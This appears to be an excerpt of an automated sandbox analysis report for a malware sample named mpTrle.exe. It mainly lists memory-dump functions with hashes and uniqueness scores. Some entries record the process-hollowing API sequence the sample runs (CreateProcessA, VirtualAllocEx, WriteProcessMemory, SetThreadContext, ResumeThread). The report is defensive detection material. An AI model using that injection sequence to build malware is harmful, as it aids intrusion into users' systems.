String ID:
API String ID:
Opcode ID: 56687ce55c7224ef71dcf1010c8a232757d0a49e9b0b9e216aa8fe90c44d99e3
Instruction ID: d0b8899ae0b062b18b0e52fbe0d0952ecedb7c9f39416d1004f4d2b2224107af
Opcode Fuzzy Hash: 56687ce55c7224ef71dcf1010c8a232757d0a49e9b0b9e216aa8fe90c44d99e3
Instruction Fuzzy Hash: 0021CFB1D01219AFDB00DF9AD884ADEFFB8FB49310F50852AE918A7200C374A954CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0036FEC0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cfdb566be549572ef0b96e60f36bd4d3ab447523e218621c1d91af3fbf36910
Instruction ID: 241f1ad76a33b4315395d4caa3cd3c58c8b8e6e83a706bc7c710d93f6840b66f
Opcode Fuzzy Hash: 7cfdb566be549572ef0b96e60f36bd4d3ab447523e218621c1d91af3fbf36910
Instruction Fuzzy Hash: 1A21F2B5D012599FDB01CFAAD884ADEFFB4FB49310F10822AE918A7200C374A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0029D02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.448860375.000000000029D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0029D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_29d000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
Instruction ID: 4e55d0178719ab67830598054d26346677f1c732c31324750ef0222dfe931be7
Opcode Fuzzy Hash: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
Instruction Fuzzy Hash: 59119A75504280DFDB11CF24D9C4B15FFA1FB84314F28C6AAD8494B656C33AD86ADFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00361488 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91bf289a235cab278f2b165902e1dd42c831b9388bce76aa904cb1a4c9ee47d5
Instruction ID: fea58fa89af2fb66bc39ae5a949346643e4b4ff497378bb55b3da3308e6de6e7
Opcode Fuzzy Hash: 91bf289a235cab278f2b165902e1dd42c831b9388bce76aa904cb1a4c9ee47d5
Instruction Fuzzy Hash: 0D016131E012148FCB26EFB984461AEBBF5EF89311F258479D405EB249EA35C9418B91

Uniqueness

Uniqueness Score: -1.00%

Function 008B4A21 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdbe226461e664eae71d64e0267faf47aeed3a222ab88305cf10c7edb38ef795
Instruction ID: a3ec3319b59190921f08c0aee99eac8e840400694f337b9f5eefd3e33c18e6c4
Opcode Fuzzy Hash: cdbe226461e664eae71d64e0267faf47aeed3a222ab88305cf10c7edb38ef795
Instruction Fuzzy Hash: 0601D8317081644FCB11DA38A86576ABBE5EB86310F10957EE04ACB352EA25EC0687C5

Uniqueness

Uniqueness Score: -1.00%

Function 008B0907 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40c5f6c60d0b1b64188eba7c86b7a1005b82612a52b74822373830e00f5bd46f
Instruction ID: 9489ea06cd8132ea2b4466d6294394b6bcfc73841510078f5da3415743e349cf
Opcode Fuzzy Hash: 40c5f6c60d0b1b64188eba7c86b7a1005b82612a52b74822373830e00f5bd46f
Instruction Fuzzy Hash: 6A01A735B041104FEB259ABD9455BAFBBD6EBD5710F14883AE18ECB342DA31DC028B91

Uniqueness

Uniqueness Score: -1.00%

Function 008B02B8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c6d18b97b824165bd893e79177c39b1bae011fdb665b7be276afe3dc6345d7f
Instruction ID: 0628845fc283793c56f0378654cf457f249ccff631562b332fdc75bf1c538a15
Opcode Fuzzy Hash: 7c6d18b97b824165bd893e79177c39b1bae011fdb665b7be276afe3dc6345d7f
Instruction Fuzzy Hash: 2901A732B500145FCF5599B8C865BEF7BAAFBC8350F01453AD40AD7384EE649D0687D1

Uniqueness

Uniqueness Score: -1.00%

Function 008B0040 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 125ee7d64cd87e5d03771df806016a738becafa2df8f391356e4e675bd6ac655
Instruction ID: 546ff18a2cc8a0de80efc88b822a064e96cb4dc65050e02c3e4cc0d613fccfe0
Opcode Fuzzy Hash: 125ee7d64cd87e5d03771df806016a738becafa2df8f391356e4e675bd6ac655
Instruction Fuzzy Hash: E011ACB1D01619AFDB00DF9AD884ADEFBB8FB49350F50852AE918A7310C374A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 008B0918 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f04339a10fccd3caedccec66ce2b9483458e5168bbf65b190350b3c73c9ef72e
Instruction ID: a47845c4a37ddee9f89f96492d3e5521df4ba37c087a6e7e6d89e8fcff7a180b
Opcode Fuzzy Hash: f04339a10fccd3caedccec66ce2b9483458e5168bbf65b190350b3c73c9ef72e
Instruction Fuzzy Hash: 4F013135B001144FEB249ABE9459B6FABDAEBD9720F10883AE14ECB345DD75EC024B91

Uniqueness

Uniqueness Score: -1.00%

Function 008B94C8 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecbb39df830499c8c9fbdf54d72464f1f4ed2e3d3bb006cbda83e72857889f75
Instruction ID: 95e0b969fde44d7b1d669abc5be6f31eb04c901e449995467e1c0f9fe6b6891b
Opcode Fuzzy Hash: ecbb39df830499c8c9fbdf54d72464f1f4ed2e3d3bb006cbda83e72857889f75
Instruction Fuzzy Hash: 9801AF31B001144BDB259A7DA858B6F67DAEBC9720F20883AF24ECB340EE21EC034795

Uniqueness

Uniqueness Score: -1.00%

Function 008B4A30 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fab55d55affc88f058d80927383f3226bd7172e98b5706bea7433f102de9c383
Instruction ID: c28f740bc62926865f61a55115fde68bad960d6e512ed6b59d89705dfb4e2a85
Opcode Fuzzy Hash: fab55d55affc88f058d80927383f3226bd7172e98b5706bea7433f102de9c383
Instruction Fuzzy Hash: 7C014431B001244FDB10EA79E85576BB7DAEBC5715F109439E50AC7345EA25ED0287C5

Uniqueness

Uniqueness Score: -1.00%

Function 00367528 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d05e758229a7fed34004075447a68f7eeead75c1b8145294720986454d9aa95
Instruction ID: 69ba6dfcdc7c456feb30afffc18c9dcc5eed0a974900240440a5f459f222fb2c
Opcode Fuzzy Hash: 5d05e758229a7fed34004075447a68f7eeead75c1b8145294720986454d9aa95
Instruction Fuzzy Hash: 8501717491834C9FC701EFF1F886A9C7FB1EB85211B4085B9D1099F255DE306E098B92

Uniqueness

Uniqueness Score: -1.00%

Function 00367538 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.452740029.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_360000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec08c0d5186fecc5a6356beee6bed54c1bf2d44f26f9e1a654a0d8108b7bc22c
Instruction ID: c33b7af28504493bfc0e40e7afe476e3735c253649382280b040dbad00e3c1b0
Opcode Fuzzy Hash: ec08c0d5186fecc5a6356beee6bed54c1bf2d44f26f9e1a654a0d8108b7bc22c
Instruction Fuzzy Hash: 73F03174A1430C9FDB40FFF5F88AA6D7BB1EB84311B508579D2099B254DE706E498B81

Uniqueness

Uniqueness Score: -1.00%

Function 008B29D0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.455190557.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8b0000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13073295b3857edb09f09d224e370bcdb0e53ca8d3fbce325fb57fff0cca27f2
Instruction ID: 99b80976c8f2930a03847a3d13f4ad609a063c1acc6be3a7b073382a13a262c3
Opcode Fuzzy Hash: 13073295b3857edb09f09d224e370bcdb0e53ca8d3fbce325fb57fff0cca27f2
Instruction Fuzzy Hash: A2F08235A04124CFCB349E40E9847ECBBB5FF40325F245861D801D7394C3709D82CB50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mpTrle.exePID: 3780, Parent PID: 1244COMMON

Execution Graph

Execution Coverage:	14%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	106
Total number of Limit Nodes:	0

Executed Functions

Function 00BF0040 Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00BF0307

Memory Dump Source

Source File: 0000000E.00000002.449996318.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_bf0000_mpTrle.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7d48872c6bbfbec5564262b375b6b96025ab3cf4b0bf23c6cca50fa5da4f0a81
Instruction ID: a828c27bcf142abd52f2f6cbdd6d266ed448aff43653e9c4588278a22019e0b9
Opcode Fuzzy Hash: 7d48872c6bbfbec5564262b375b6b96025ab3cf4b0bf23c6cca50fa5da4f0a81
Instruction Fuzzy Hash: DBC103B1D0022D8FDB24DFA4C845BEDBBF1BB49300F1091A9E919B7250DB749A89CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0038F7D9 Relevance: 1.6, APIs: 1, Instructions: 119
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0038F8B3

Memory Dump Source

Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: da71722f444ef8ef1725dd7d66a6a1d364a1bfa7127380ae28cbc09728f745d6
Instruction ID: 67402546043aa88d9fa5387dfcf3c965cd8ed0007a56272c160a3b532a033640
Opcode Fuzzy Hash: da71722f444ef8ef1725dd7d66a6a1d364a1bfa7127380ae28cbc09728f745d6
Instruction Fuzzy Hash: 0541AAB5D012589FDF00CFA9D984AEEBBF1BF49300F20942AE814BB210D334AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0038F7E0 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0038F8B3

Memory Dump Source

Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f3b22e599943021bbee7e0f865d97bbe8536708f682614e17788de305ea74e7a
Instruction ID: 09797064acfaebcef13f31aeb129d602a35aba21094c981de6423a8c9f9d733b
Opcode Fuzzy Hash: f3b22e599943021bbee7e0f865d97bbe8536708f682614e17788de305ea74e7a
Instruction Fuzzy Hash: 8541ABB5D012589FDF00DFA9D984ADEBBF1BF49310F20942AE814BB210D335AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0038F938 Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0038F9F2

Memory Dump Source

Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 82df049c3ec2bffff442145075bb882d5bb6e8859815c7bdd0ffba2bf0df2487
Instruction ID: 5fed3b00e7d8b015230e187594be2ba9ef0b5c46883d2b857c23fd86da54af67
Opcode Fuzzy Hash: 82df049c3ec2bffff442145075bb882d5bb6e8859815c7bdd0ffba2bf0df2487
Instruction Fuzzy Hash: 1641A6B8D002589FDF10CFA9D884AEEFBB1BF49310F20942AE815BB210D375A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0038F940 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0038F9F2

Memory Dump Source

Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d5a7be3759a9939008f4538818968a05503e5f46524c300ce658fcdef3f47b3d
Instruction ID: 212f9754513e3dac6b564d86f027167449a5a9128c60218c6fa815d928e35c10
Opcode Fuzzy Hash: d5a7be3759a9939008f4538818968a05503e5f46524c300ce658fcdef3f47b3d
Instruction Fuzzy Hash: DD4198B8D002589FCF00DFA9D884AEEFBB5BB49310F20942AE814B7210D775A945DF65

Uniqueness

Uniqueness Score: -1.00%

Function 0038F6B0 Relevance: 1.6, APIs: 1, Instructions: 105
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0038F762

Memory Dump Source

Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 968a50a6bf5a4baec8b8b3e295c9e3242075514b7e99492f8ca7499d82f1cf6c
Instruction ID: f40ac4565c23c9c3960cd3b6cf742fe75cd7a319c2e18b71cd4fcafb9b6d2e3c
Opcode Fuzzy Hash: 968a50a6bf5a4baec8b8b3e295c9e3242075514b7e99492f8ca7499d82f1cf6c
Instruction Fuzzy Hash: 9741A8B8D002589FDF10CFA9D984AEEFBB1BF49310F20942AE814BB210D375A905CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0038F6B8 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0038F762

Memory Dump Source

Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e08e700bf09a9ea8d407adb8d6e7fdb24e22d002ca090c8826d9091c47630726
Instruction ID: a57b2fde0c0af2114c5e29c8478fbee9037df5eda3cd9d84b4992bb16d3f75cb
Opcode Fuzzy Hash: e08e700bf09a9ea8d407adb8d6e7fdb24e22d002ca090c8826d9091c47630726
Instruction Fuzzy Hash: 2E4197B8D00258DFDF10CFA9D984ADEBBB5BB49310F20942AE814BB210D775A905CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0038F581 Relevance: 1.6, APIs: 1, Instructions: 97
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0038F637

Memory Dump Source

Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 5e51f0a0f0e9a19bbee596ecceefdb4c1306541859e69786f0c0709b39acb830
Instruction ID: ebf4a8d62c0a69683ac377a033fac8e743b2cd6fc580a725c606f913ce12347d
Opcode Fuzzy Hash: 5e51f0a0f0e9a19bbee596ecceefdb4c1306541859e69786f0c0709b39acb830
Instruction Fuzzy Hash: D341BBB4D012589FDB10DFA9D884AEEFBB1AF89314F24802AE418B7250D779A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0038F588 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0038F637

Memory Dump Source

Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7e436ef6fda3f503f42a00d124960660fe9b65fc6ae19579ba41c4d3b0d89f09
Instruction ID: c8932844089825685c685d96425ea4b62e44d263bbedc22f74687ddeb084587a
Opcode Fuzzy Hash: 7e436ef6fda3f503f42a00d124960660fe9b65fc6ae19579ba41c4d3b0d89f09
Instruction Fuzzy Hash: 1E41ACB4D01258DFDB10DFA9D884AEEBBB1AF49314F24802AE414B7250D779A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0038EC20 Relevance: 1.6, APIs: 1, Instructions: 78
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 0038ECA6

Memory Dump Source

Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4c22db94c4e629dc6ce4dcd0fcdabbd5efc41bd339044e30467735f5158af8ab
Instruction ID: 8162fdc04ca1dbd4dcd641b49093da6aefbd93dd8a81eadc84384617251f0367
Opcode Fuzzy Hash: 4c22db94c4e629dc6ce4dcd0fcdabbd5efc41bd339044e30467735f5158af8ab
Instruction Fuzzy Hash: 4B31CAB4D002189FDF10CFA9D884AEEFBB1AB89314F24842AE814B7310D735A905CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0038EC28 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0038ECA6

Memory Dump Source

Source File: 0000000E.00000002.449544321.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_380000_mpTrle.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1bbfdfe769db76fefc447e0903b5b604097b696f4df1650676eaabcdb5b7241b
Instruction ID: 8960c78b9c6861f918fbfb467f3da96b255b863ec7bca40bd31c2e59aad1bca7
Opcode Fuzzy Hash: 1bbfdfe769db76fefc447e0903b5b604097b696f4df1650676eaabcdb5b7241b
Instruction Fuzzy Hash: A531D9B4D002189FDF10CFAAD884ADEFBB4AF89310F20842AE814B7300D735A901CF94

Uniqueness

Uniqueness Score: -1.00%

Function 047E87F8 Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

^K, xrefs: 047E884B, 047E8877, 047E88AA, 047E88D7, 047E8924, 047E8955, 047E89AA

Memory Dump Source

Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd

Similarity

API ID:
String ID: ^K
API String ID: 0-554138718
Opcode ID: ff931aaece1786092108fad36d728ff8139a751bce07885b84962d931b314448
Instruction ID: 0f5e9df2c4dd5299258952cff58d0ad47a7818e4d0c43881159fda2deced6b52
Opcode Fuzzy Hash: ff931aaece1786092108fad36d728ff8139a751bce07885b84962d931b314448
Instruction Fuzzy Hash: 7A51C570E042189FDB14EFA9E984AEEBBF6EB8D300F909165E805B7354C734A946CF54

Uniqueness

Uniqueness Score: -1.00%

Function 047E85E0 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

^K, xrefs: 047E8622

Memory Dump Source

Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd

Similarity

API ID:
String ID: ^K
API String ID: 0-554138718
Opcode ID: 3dea3a0b3909f6d0e1120f27fa85bf803b06314a41966350938a18c0a21c064c
Instruction ID: b0dfd56d0527bbd18b8636c275e93ab61fa834a64844c802668affc92a1100e7
Opcode Fuzzy Hash: 3dea3a0b3909f6d0e1120f27fa85bf803b06314a41966350938a18c0a21c064c
Instruction Fuzzy Hash: F941DF74E012189FCB00EFA9D884AEEBBB1FB8C320F509569E810B7355D735A995CF94

Uniqueness

Uniqueness Score: -1.00%

Function 047E82D0 Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

^K, xrefs: 047E82FD, 047E8321

Memory Dump Source

Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd

Similarity

API ID:
String ID: ^K
API String ID: 0-554138718
Opcode ID: 4f2cf68cce4d57ca9385bc6e79a7d57482ff96d3e603402d7c34ebe122ae6fdc
Instruction ID: 7f34811b7e7640a99d55a7b3107073c3b83b077a42ee8c254e419cd30aee2dc7
Opcode Fuzzy Hash: 4f2cf68cce4d57ca9385bc6e79a7d57482ff96d3e603402d7c34ebe122ae6fdc
Instruction Fuzzy Hash: B2316B74E002199FDB00EF94E881AEEBBB1FF88310F508125E904BB354D770AA55CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 047E7FE8 Relevance: 1.3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

^K, xrefs: 047E80B4

Memory Dump Source

Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd

Similarity

API ID:
String ID: ^K
API String ID: 0-554138718
Opcode ID: 7c0c4be20d2884b98e5f0bd86bd67581ada28b35faa79ac0f700b06a0b60e30d
Instruction ID: c493d0da1cdac8a00fb927e727901b93f688301fa9f86590b36af5ba2eafb0ad
Opcode Fuzzy Hash: 7c0c4be20d2884b98e5f0bd86bd67581ada28b35faa79ac0f700b06a0b60e30d
Instruction Fuzzy Hash: F031B470A10508DFD758DF5AE684A5DBBF1FF8C300BA281E5D4449B769DB30AE11DB08

Uniqueness

Uniqueness Score: -1.00%

Function 047E8180 Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

^K, xrefs: 047E8200

Memory Dump Source

Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd

Similarity

API ID:
String ID: ^K
API String ID: 0-554138718
Opcode ID: 90749c7cec81ce25dff06d695c93621fc1ca63775aef88d3519ed559bf046cd8
Instruction ID: e7f95e86eee85f004fdfea64f9dee0cbe599ef0c64584caf5bb000ad4d703cad
Opcode Fuzzy Hash: 90749c7cec81ce25dff06d695c93621fc1ca63775aef88d3519ed559bf046cd8
Instruction Fuzzy Hash: A611D434A00508DFC750DF99F58499DBBF0FB88310F9241E5D88497769DB30AAA1CB49

Uniqueness

Uniqueness Score: -1.00%

Function 047ED0E8 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3708cff61f3d8a6a139becea659024965eced40869b7eb57fd8956eb41547078
Instruction ID: 465c493a7c792cad6fb7ffbfd541986135652d181b0013dbc7353d868c78b796
Opcode Fuzzy Hash: 3708cff61f3d8a6a139becea659024965eced40869b7eb57fd8956eb41547078
Instruction Fuzzy Hash: C561D474E04209CFDB18CFEAD984AEDFBB6BF89300F109129D419AB355D735A946CB50

Uniqueness

Uniqueness Score: -1.00%

Function 047EAA18 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e54fe671c3f9cdebc566958972745d4a0c613f88d568f5fc094d979fef8dd13
Instruction ID: 330b3a18eaecf370e036f868c91e6f2b22f32c42d9fc6cd7af7f1f0a7a4d77ed
Opcode Fuzzy Hash: 0e54fe671c3f9cdebc566958972745d4a0c613f88d568f5fc094d979fef8dd13
Instruction Fuzzy Hash: 2941F574E002199FDB44DFAAD990AAEB7B2EF8C310F148569D815E7350EB31A942CF90

Uniqueness

Uniqueness Score: -1.00%

Function 047EF7F0 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.461687956.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_47e0000_mpTrle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567e389cd84baa4ce82d20a191a6c8283aa8e00f5b90a54f529aa8e17fe38b2e
Instruction ID: e0edc290e4c7c039006dd05994694994f9fe6f557bb163353fa7a3aedfa94399
Opcode Fuzzy Hash: 567e389cd84baa4ce82d20a191a6c8283aa8e00f5b90a54f529aa8e17fe38b2e
Instruction Fuzzy Hash: F341EE74E15218ABCB04CFAAD884AEDBBB5FF8C310F50922AD415A7701D730A956CFA0

Uniqueness

Uniqueness Score: -1.00%

